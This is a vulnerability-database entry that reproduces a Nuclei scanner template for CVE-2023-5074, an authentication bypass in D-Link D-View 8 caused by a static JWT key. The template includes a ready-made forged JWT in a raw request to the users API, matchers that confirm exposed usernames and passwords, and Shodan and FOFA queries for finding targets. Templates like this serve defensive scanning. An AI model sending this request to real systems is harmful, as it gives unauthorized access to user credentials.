
D-Link D-View 8 v2.0.1.28 - Authentication Bypass

2023-09-26 14:35:39
ProjectDiscovery
github.com
Tags: dlink, d-view 8, authentication bypass, cve2023, jwt token, vulnerability, mitigation

AI Score: 9.7 High (Confidence: High)

EPSS: 0.017 Low (Percentile: 87.6%)

Use of a static key to protect a JWT token used in user authentication can allow an authentication bypass in D-Link D-View 8 v2.0.1.28.

id: CVE-2023-5074

info:
  name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2023-32
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5074
    - https://github.com/codeb0ss/CVE-2023-5074-PoC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5074
    cwe-id: CWE-798
    epss-score: 0.01695
    epss-percentile: 0.87453
    cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: d-view_8
    shodan-query: http.favicon.hash:-1317621215
    fofa-query: icon_hash="-1317621215"
  tags: cve2023,cve,d-link,auth-bypass,dlink

http:
  - raw:
      - |
        GET /dview8/api/usersByLevel HTTP/1.1
        Host: {{Hostname}}
        Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
          - 'contains(header, "application/json")'
        condition: and
# digest: 4b0a00483046022100df91a0e799ab437aded5b1e9356b00c8a63803525cd7a4b511a6a90c80fe4c58022100eb14a4a52eac5c1d7dceaf823ff1aab3ad05bd419e17aac856014de6121c5f37:922c64590222798bb761d5b6d8e72950
